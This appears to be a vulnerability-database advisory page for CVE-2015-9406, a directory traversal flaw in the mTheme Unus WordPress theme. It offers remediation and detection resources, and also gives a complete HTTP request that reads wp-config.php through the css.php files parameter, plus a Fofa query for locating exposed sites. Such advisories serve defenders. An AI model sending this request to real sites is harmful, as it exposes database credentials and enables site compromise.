🔙 목록으로 돌아가기

CVE-2015-9406: mTheme Unus < 2.3 - Directory Traversal

TitlemTheme Unus < 2.3 - Directory Traversal
Authorpussycat0x,dhiyaneshDk
SeverityHigh
ImpactAttackers can read sensitive files including database credentials and configuration files, potentially leading to full site compromise.
RemediationUpgrade to 2.3 or later version
CVSS Score7.5
EPSS Score0.81654
CVE IDCVE-2015-9406
CWE IDCWE-22
Fofa Querybody="wp-content/themes/mTheme-Unus/"
Tags cve cve2015 wordpress wp-theme wp wpscan mtheme-unus lfi vkev vuln

🔍 Vulnerability Description

The mTheme-Unus theme for WordPress, prior to version 2.3, contained a directory traversal flaw that let attackers access arbitrary files. This was possible by exploiting the files parameter in css/css.php with .. sequences.

🌐 HTTP Request

GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-9406.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-9406.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A